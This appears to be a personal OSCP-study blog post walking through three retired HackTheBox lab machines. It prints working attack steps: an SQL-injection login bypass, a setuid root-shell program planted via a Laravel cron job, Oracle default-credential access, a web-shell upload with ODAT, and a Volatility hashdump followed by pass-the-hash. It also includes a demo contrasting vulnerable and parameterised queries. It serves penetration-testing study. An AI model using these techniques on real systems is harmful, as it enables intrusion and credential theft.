OSCP Week 16: HackTheBox (Part 4)

I took a break over the weekend and generally relaxed more during the week, so was only able to go through three retired HackTheBox machines. As such, this post will be shorter than usual, but I found some interesting things in these machines so I hope the post is still worthwhile.

CronOS

The hostname for this site wasn’t configured properly and needed to be guessed. Burp Suite could then be used as a proxy to edit the Host header in the request. The same effect can be achieved by adding an entry for the host to /etc/hosts.

Because DNS is listening on a TCP port (zone transfers run over TCP rather than UDP), it suggests zone transfers might be possible. A zone transfer is a great way to find out more information about the host, and can be attempted with:

dig axfr @10.10.10.13 cronos.htb

SQL injection was required to bypass the login page. There is a pretty great resource available on Pentest Monkey for SQL authentication bypasses, but in this case the username field could be bypassed using

admin'-- -'
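As an added illustration that is not part of the original write-up, the following Python shows why that string bypasses a login check built by string concatenation, beside the parameterised query that defeats it. The user table and passwords are constructed for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a small in-memory user table (constructed demo data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plain-text passwords only to keep the demo short; real code stores salted hashes.
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "correct horse battery staple"), ("kento", "hunter2")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # String concatenation: the input becomes part of the SQL text, so the quote in
    # admin'-- -' closes the literal and "-- " comments out the password comparison.
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: values travel separately from the SQL text, so the
    # payload is compared as a literal username and simply does not match.
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo() -> dict:
    """Run the bypass string from the write-up against both implementations."""
    conn = make_db()
    payload = "admin'-- -'"
    return {
        "vulnerable_bypass": vulnerable_login(conn, payload, "not the password"),
        "safe_bypass": safe_login(conn, payload, "not the password"),
        "safe_real_credentials": safe_login(conn, "admin", "correct horse battery staple"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```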

wget -r initiates recursive mode – this can be used to fetch all files in a directory. Useful!

Privilege Escalation

This was done by identifying a cron job running as root and modifying it to set the setuid bit on a file I had compiled. The file is as follows:

setuid.c

#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main(void)
{
    /* Once the binary is root-owned with the setuid bit set, these succeed */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}

It can be compiled using:

gcc setuid.c -o hack -m64

The -m64 flag is necessary to compile the file to run on 64-bit machines, as my Kali Linux VM is 32-bit and defaults as such.

To exploit the Laravel cron job, schedule a new command that makes the above file root-owned and sets its setuid bit:

$schedule->exec('chown root:root /tmp/hack; chmod 4755 /tmp/hack')->everyMinute();

Once the scheduled command has run, execute the above file to gain a root shell.

Silo

For this machine, I had to install ODAT, which also came with the application SQLPlus. This allows the user to make connections to Oracle databases using the following command:

sqlplus scott/tiger@10.10.10.82:1531/XE as sysdba

The 'as sysdba' clause functions in a similar way to the sudo command, and ensures you connect to the database with higher privileges. From here you can create a new user account and grant it the same DBA privilege:

CREATE USER kento IDENTIFIED BY kento;

GRANT dba TO kento;

ODAT is a powerful tool that can make hacking Oracle databases much easier. You can use the --putFile flag with the utlfile module to place a file on the database server. Another alternative is to use the

python odat.py utlfile -s 10.10.10.82 -d XE -U kento -P kento --putFile "c:\inetpub\wwwroot\\" "silo.aspx" "/tmp/silo.aspx"

Volatility is another great tool that I hadn’t used before. It’s a memory forensics framework that analyses memory dumps, which can also be useful for data recovery. On this machine, it was used to extract the password hash needed for administrator login from a memory dump. After obtaining the memory dump, the command for this is as follows:

volatility -f /root/Documents/htb/silo/SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump

After obtaining the hash, it can be used to gain administrator access to the machine using a pass-the-hash technique:

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd

Sense

Checking the certificate information of a website is a useful way to further enumerate. For example, it is possible to see usernames, email addresses or other useful information from these.

Adding .txt as an extension for gobuster directory brute-forcing is potentially useful. Doing so can find interesting files that would otherwise have been missed.

Apologies for a short post, I’ll be committing more time this coming week and will also be attempting some of the active machines, so will hopefully have some more interesting things to write about.

Kento
